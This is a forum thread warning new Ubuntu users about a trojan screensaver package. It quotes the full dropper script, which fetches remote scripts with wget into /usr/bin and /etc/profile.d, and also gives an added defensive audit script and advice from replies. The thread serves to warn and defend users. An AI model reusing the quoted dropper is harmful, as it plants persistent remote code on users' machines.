    A WARNING for Newbies about untrusted sites!

    Twenty four hours ago an Ubuntu user downloaded a screen saver from an UNTRUSTED site.

    It was a Trojan.

    The lesson is clear. If you are a newbie DO NOT install files or packages from untrusted sites.

    Here was his cry for help:
    Hello guys, I'm going to make this brief.

    I have installed a deb from a site claiming to be a screensaver. It looked dodgy, however I proceeded.

    After I looked into the source I found MYSTERIOUS ACTIVITY FOR WHAT SHOULD BE A SCREENSAVER... IS THIS REQUIRED? (below)
    (also no screensaver was ever shown in gnome-screensaver)

    #!/bin/sh
    cd /usr/bin/
    rm Auto.bash
    sleep 1
    wget http://05748.t35.com/Bots/Auto.bash
    chmod 777 Auto.bash
    echo -----------------
    cd /etc/profile.d/
    rm gnome.sh
    sleep 1
    wget http://05748.t35.com/Bots/gnome.sh
    chmod 777 gnome.sh
    echo -----------------
    clear
    exit


    I'm no expert, but this looks just wrong!!

    I have removed the package, however I doubt this has done much good...

    Please help, comments exist from other users who have downloaded this file not understanding why their screensaver did not show up and probably left the file installed.

    This all just literally happened in the last few minutes and I'm afraid to reboot my computer.. should I reinstall my gnome packages?

    Or was I just being paranoid? I'm thinking I should contact the other users who have downloaded the file and request the file be pulled if it is in fact some attack...

    Sorry for sounding strange, just trying to fix this A.S.A.P.

    Thank you for any suggestions.
    The sequence of events which followed is documented in this Ubuntu forum thread.

    In 19 hours the Trojan was analyzed and traced back to the bad guy's site, which was shut down. During that analysis, bash commands to eliminate the files were worked out in the thread. When the discussion started wandering the thread was closed.

    The OP was lucky. One command in the script apparently tried to run "rm -f /*.*", in an attempt to delete the contents of the hard drive, but the bad guy's syntax is defective. The bulk of the Trojan replaces a couple of GNOME files and puts a script into /etc/profile.d, which gets run every time the user logs in. That script does a wget on the hacker's site to download any upgrades to the Trojan's payload.

    Then, they discovered him:
    http://www.mmowned.com/forums/wow-sc...hing-pack.html

    Look here guys

    Turns out it is a WoW fanboy... most important thing is to get the identity of this person and pull down the file

    he refers to the link in here.. of http://05748.t35.com/ script thing
    Here's his confession:
    The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.
    Within a few hours, by msg #29, the malware had been removed from Gnome-look.org.

    To check their machines after the malware was cleaned off it was recommended that they run
    ps -C wget
    every few hours for a couple of days, to see if a wget process is running that they didn't start.

    Then, the following message was found on the bad guy's web site:
    If you're reading this from coming from that ubuntu forums place, Well done you saw right through my "Screensaver" cough cough wink wink, I can tell you this. Basically after getting some scripts to run upon start up, It then sets to work downloading another file, This can be changed on my server so in essence i could do whatever i like on your computer, But i only really want to perform a DOS (denial of service) attack, For no reason I'm attacking mmowned.com, Just using it as a test. Hats Off!
    Within a few hours, by msg #95, both the screen saver and the bad guy's website had been taken down!

    I can't let this go without mentioning that if you had been running Windows you would still be waiting for "Tuesday Update", IF Microsoft let you know about the exploit at all.
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.
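    A defender-side version of the checks the thread settled on, added here as an example that is not part of the thread or any poster's advice: it scans a profile.d-style directory for world-writable or unpackaged scripts (the dropper ran chmod 777 and wrote gnome.sh there), tests for the dropper's two paths, and wraps the ps -C wget check. It assumes a Debian-style system with dpkg; without dpkg only the permission check runs.

```shell
#!/bin/sh
# Added example, not from the thread: flag files in a profile.d-style directory
# that are world-writable (the dropper ran chmod 777) or, where dpkg exists,
# owned by no package; also test for the dropper's paths and a running wget.

# Paths written by the dropper script quoted in the post.
DROPPER_PATHS="/usr/bin/Auto.bash /etc/profile.d/gnome.sh"

# flag_files DIR: print each regular file in DIR that is world-writable or,
# when dpkg is available, not owned by any package. Returns 1 if any printed.
flag_files() {
    hits=0
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        reason=""
        # -perm -002: other-write bit set, so anyone can edit a login script
        if [ -n "$(find "$f" -perm -002 -print)" ]; then
            reason="world-writable"
        elif command -v dpkg >/dev/null 2>&1 && ! dpkg -S "$f" >/dev/null 2>&1; then
            reason="not owned by any package"
        fi
        if [ -n "$reason" ]; then
            echo "$f: $reason"
            hits=1
        fi
    done
    return $hits
}

# dropper_paths_present: print any of the dropper's known paths that exist; returns 1 if so.
dropper_paths_present() {
    hits=0
    for p in $DROPPER_PATHS; do
        if [ -e "$p" ]; then echo "$p: present"; hits=1; fi
    done
    return $hits
}

# wget_running: the thread's "ps -C wget" check using only POSIX ps options.
wget_running() {
    ps -eo comm= | grep -qx wget
}

# Usage: sh audit.sh /etc/profile.d
if [ $# -gt 0 ]; then
    flag_files "$1" || true
    dropper_paths_present || true
    if wget_running; then echo "a wget process is running"; fi
fi
```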

    #2
    Re: A WARNING for Newbies about untrusted sites!

    Thanks GG.

    I am personally appalled by the shameless behavior of the perpetrator.

    This should serve as an example of why it is so important to stick to the official repositories as much as possible. Giving root access to unknown third parties without a thorough vetting is just asking for trouble.
    Welcome newbies!
    Verify the ISO
    Kubuntu's documentation



      #3
      Re: A WARNING for Newbies about untrusted sites!

      "When in doubt, chicken out."

      If you can't/won't practice safe computing, don't be surprised when you get bit. I don't care if you run Windowz, Linux, Unix, Apple, or any other OS. It CAN happen to you if you aren't careful.

      If you don't watch out for your PC, someone else will!
      Windows no longer obstructs my view.
      Using Kubuntu Linux since March 23, 2007.
      "It is a capital mistake to theorize before one has data." - Sherlock Holmes



        #4
        Re: A WARNING for Newbies about untrusted sites!

        Actually, even if you're an experienced user, don't download things from untrusted sites. You have better things to do than finding and fixing problems created by internet predators and practical jokers.

        That said, even if a download comes from a site that you trust: keep a log of what you download and when, so that, if a problem arises, you have a clue as to what might have caused it.



          #5
          Re: A WARNING for Newbies about untrusted sites!

          Thanks askrieger, keeping a log is a brilliant idea for untrusted sites. To me a download has to be some serious program (e.g. playout software), in which case there is not much chance that the people developing it are playing around. I find it hard to understand that someone would think it worth taking a chance on something as frivolous as a screen saver. Perhaps they didn't know why there are trusted repositories and we need to promote that idea a little more. I'm not paranoid, I just don't take chances I don't need to take.

          BTW, there is a discussion about this on slashdot. I must say there is an unusually large proportion of non technical people there. That's why I never call myself a nerd - to distance myself from sites like that.



            #6
            Re: A WARNING for Newbies about untrusted sites!

            Originally posted by askrieger
            ......
            That said, even if a download comes from a site that you trust: keep a log of what you download and when, so that, if a problem arises, you have a clue as to what might have caused it.
            That is why I use Synaptic. Its "File --> History" menu option gives a log of installations and removals, subdivided into year-->month-->day. Other front ends do as well, but Synaptic's log is easier to use, IMO.



              #7
              Re: A WARNING for Newbies about untrusted sites!

              I just love how fast that whole issue was resolved.
              Mark Your Solved Issues [SOLVED]
              (top of thread: thread tools)



                #8
                Re: A WARNING for Newbies about untrusted sites!

                The speed of the fix is a typical result of attacks on Linux and its utilities. That's because:

                1) FOSS users can PUBLICLY report any exploits they find without fear of being sued by proprietary corporations trying to protect their profit stream.

                2) FOSS users can post proof of concept codes along with the announcement of an exploit so other FOSS users can test their installation to see if they are susceptible, and to check any fixes that are released to see if they work.

                3) Fixes and patches are released ASAP, not on some day convenient to a proprietary software house with profit streams to protect.

                That's why Windows has infected computers and malware numbering in the MILLIONS. In July of 2001, a Windows virus called "CodeRed" succeeded in infecting several million Windows boxes in a 24-hour period. The total number of infectious agents in the wild that succeeded in capturing more than a handful of Linux boxes before they were discovered and the patch eliminated them amounts to less than a dozen. The largest number of Linux computers ever infected by a single agent in one incident was in July of 2002, when about 25,000 Linux computers in Eastern Europe, running a bootleg copy of a commercial version of Linux which installed its user as root, were compromised by "Slapper", a web based infectious agent which used a technique similar to Code Red. Users running under their home accounts were not affected.
